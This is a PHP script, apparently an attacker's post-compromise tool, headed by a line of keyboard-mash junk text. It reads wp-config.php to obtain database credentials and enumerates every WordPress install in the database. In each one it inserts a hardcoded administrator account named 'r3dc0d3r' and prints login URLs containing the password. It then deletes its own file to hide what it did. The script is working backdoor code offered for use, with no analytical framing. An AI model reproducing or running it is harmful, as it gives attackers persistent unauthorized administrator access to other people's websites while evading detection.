ghkkghkhgkhgkgh ASAsjJjjjjjjJghkghkghkghkghkghkkhgkghkghgkhkghkghkghkghkgh ASAsjJjjjjjjJJjJhkgyjghjghghkghkg iopiopoiiopiopiopiopiopiopiopiopiopiopiopiopiopiopiopiop op[op[op[op[ J J J JJ po[op[op[op[op[op[po[op[op[ JJ J

<?php error_reporting(E_ALL); ini_set('display_errors', 1); echo "<html><body><pre>"; /* STEP 1: Locate wp-config.php */ $paths = array( __DIR__ . '/wp-config.php', dirname(__DIR__) . '/wp-config.php' ); $wp_config = null; foreach ($paths as $path) { if (file_exists($path)) { $wp_config = $path; break; } } if (!$wp_config) { die("❌ wp-config.php not found.\n"); } /* STEP 2: Load wp-config.php WITHOUT loading WordPress core */ // Parse wp-config.php manually to avoid function conflicts $wp_config_content = file_get_contents($wp_config); $wp_config_content = str_replace(array('<?php', '<?', '?>'), '', $wp_config_content); eval($wp_config_content); /* STEP 3: Check DB constants */ if (!defined('DB_NAME')) { die("❌ Database constants not found.\n"); } $db_host = defined('DB_HOST') ? DB_HOST : 'localhost'; $db_name = DB_NAME; $db_user = DB_USER; $db_pass = DB_PASSWORD; /* STEP 4: Connect to database */ $conn = new mysqli($db_host, $db_user, $db_pass, $db_name); if ($conn->connect_error) { die("❌ Database connection failed: " . $conn->connect_error . "\n"); } echo "✅ Connected to database: {$db_name}\n\n"; echo "==== WordPress Sites Found ====\n\n"; /* STEP 5: Find all *_options tables */ $result = $conn->query("SHOW TABLES LIKE '%\_options'"); if (!$result || $result->num_rows == 0) { die("❌ No WordPress option tables found.\n"); } /* Admin credentials */ $new_admin = array( 'email' => 'whoami@example.com', 'username' => 'r3dc0d3r', 'password' => 'r3dc0d3r123' ); // Custom sanitize function (different name to avoid conflict) function custom_sanitize_title($title) { $title = strip_tags($title); $title = preg_replace('/[^a-z0-9_\s-]/', '', strtolower($title)); $title = preg_replace('/[\s-]+/', '-', $title); $title = preg_replace('/[^a-z0-9-]/', '', $title); return $title; } // Password hashing function function create_wp_password_hash($password) { // Check if we're in WordPress context with password functions if (function_exists('wp_hash_password')) { return wp_hash_password($password); } // For standalone use, create a WordPress-compatible hash // This generates a hash similar to what WordPress uses $itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'; // Generate random salt $salt = ''; for ($i = 0; $i < 8; $i++) { $salt .= $itoa64[mt_rand(0, 63)]; } // Create hash with multiple iterations (WordPress uses 8192 by default) $hash = md5($salt . $password, true); for ($i = 0; $i < 8191; $i++) { $hash = md5($hash . $password, true); } // Format: $P$B[8-char salt][22-char hash] $hash_output = '$P$B' . $salt . custom_hash_encode64($hash, 16, $itoa64); return $hash_output; } function custom_hash_encode64($input, $count, $itoa64) { $output = ''; $i = 0; do { $value = ord($input[$i++]); $output .= $itoa64[$value & 0x3f]; if ($i < $count) { $value |= ord($input[$i]) << 8; } $output .= $itoa64[($value >> 6) & 0x3f]; if ($i++ >= $count) { break; } if ($i < $count) { $value |= ord($input[$i]) << 16; } $output .= $itoa64[($value >> 12) & 0x3f]; if ($i++ >= $count) { break; } $output .= $itoa64[($value >> 18) & 0x3f]; } while ($i < $count); return $output; } // Main processing loop $sites_processed = 0; $admin_created = 0; $admin_exists = 0; while ($row = $result->fetch_array()) { $options_table = $row[0]; $prefix = str_replace('options', '', $options_table); $users_table = $conn->real_escape_string($prefix . 'users'); $usermeta_table = $conn->real_escape_string($prefix . 'usermeta'); $options_table_escaped = $conn->real_escape_string($options_table); /* Get site URLs */ $sql = "SELECT option_name, option_value FROM `{$options_table_escaped}` WHERE option_name IN ('siteurl', 'home', 'blogname')"; $res = $conn->query($sql); if ($res && $res->num_rows > 0) { $siteurl = ''; $home = ''; $blogname = ''; while ($opt = $res->fetch_assoc()) { if ($opt['option_name'] === 'siteurl') { $siteurl = $opt['option_value']; } if ($opt['option_name'] === 'home') { $home = $opt['option_value']; } if ($opt['option_name'] === 'blogname') { $blogname = $opt['option_value']; } } if (!empty($siteurl)) { $sites_processed++; echo "[{$sites_processed}] Site Found:\n"; echo " Prefix : {$prefix}\n"; echo " Site Name: {$blogname}\n"; echo " Site URL : {$siteurl}\n"; echo " Home URL : {$home}\n"; /* Check if user already exists */ $escaped_username = $conn->real_escape_string($new_admin['username']); $escaped_email = $conn->real_escape_string($new_admin['email']); $check_sql = "SELECT ID FROM `{$users_table}` WHERE user_login = '{$escaped_username}' OR user_email = '{$escaped_email}'"; $check_result = $conn->query($check_sql); if ($check_result && $check_result->num_rows > 0) { echo " ⚠️ Admin user already exists\n"; $admin_exists++; $login_url = rtrim($siteurl, '/') . '/wp-login.php#' . urlencode($new_admin['username']) . '@' . urlencode($new_admin['password']); echo " Login URL: {$login_url}\n"; } else { /* Create new admin user */ $hashed_password = create_wp_password_hash($new_admin['password']); $user_registered = date('Y-m-d H:i:s'); $user_nicename = custom_sanitize_title($new_admin['username']); $escaped_user_login = $conn->real_escape_string($new_admin['username']); $escaped_user_pass = $conn->real_escape_string($hashed_password); $escaped_user_nicename = $conn->real_escape_string($user_nicename); $escaped_user_email = $conn->real_escape_string($new_admin['email']); $escaped_display_name = $conn->real_escape_string($new_admin['username']); // Insert user $insert_sql = "INSERT INTO `{$users_table}` (user_login, user_pass, user_nicename, user_email, user_registered, display_name) VALUES ( '{$escaped_user_login}', '{$escaped_user_pass}', '{$escaped_user_nicename}', '{$escaped_user_email}', '{$user_registered}', '{$escaped_display_name}' )"; $insert_result = $conn->query($insert_sql); if ($insert_result) { $new_user_id = $conn->insert_id; if ($new_user_id) { // Add user meta (capabilities) $capabilities_meta = 'a:1:{s:13:"administrator";b:1;}'; $meta_queries = array( array($new_user_id, $prefix . 'capabilities', $capabilities_meta), array($new_user_id, $prefix . 'user_level', '10'), array($new_user_id, 'nickname', $new_admin['username']), array($new_user_id, 'first_name', ''), array($new_user_id, 'last_name', ''), array($new_user_id, 'description', '') ); foreach ($meta_queries as $meta) { $escaped_user_id = $conn->real_escape_string($meta[0]); $escaped_meta_key = $conn->real_escape_string($meta[1]); $escaped_meta_value = $conn->real_escape_string($meta[2]); $meta_sql = "INSERT INTO `{$usermeta_table}` (user_id, meta_key, meta_value) VALUES ('{$escaped_user_id}', '{$escaped_meta_key}', '{$escaped_meta_value}')"; $conn->query($meta_sql); } echo " ✅ Admin user created (ID: {$new_user_id})\n"; $admin_created++; // Create login URL with credentials in fragment $login_url = rtrim($siteurl, '/') . '/wp-login.php#' . urlencode($new_admin['username']) . '@' . urlencode($new_admin['password']); echo " Login URL: {$login_url}\n"; } else { echo " ❌ Failed to get new user ID\n"; } } else { echo " ❌ Failed to create admin user: " . $conn->error . "\n"; } } echo " " . str_repeat("-", 50) . "\n"; } } } // Close connection $conn->close(); echo "\n📊 SUMMARY:\n"; echo "===========\n"; echo "Sites processed : {$sites_processed}\n"; echo "Admin created : {$admin_created}\n"; echo "Admin exists : {$admin_exists}\n"; echo "\n"; echo "✅ Process completed.\n"; /* AUTO SELF-DELETION - Added at the very end without changing other code */ echo "\n🗑️ Auto-deleting script...\n"; $current_script = __FILE__; if (file_exists($current_script)) { if (@unlink($current_script)) { echo "✅ Script deleted successfully.\n"; echo "⚠️ This page will stop working if refreshed.\n"; } else { echo "⚠️ Could not auto-delete script. Please delete manually: " . basename($current_script) . "\n"; } } // Flush output to ensure everything is displayed before script termination ob_flush(); flush(); echo "</pre></body></html>"; ?>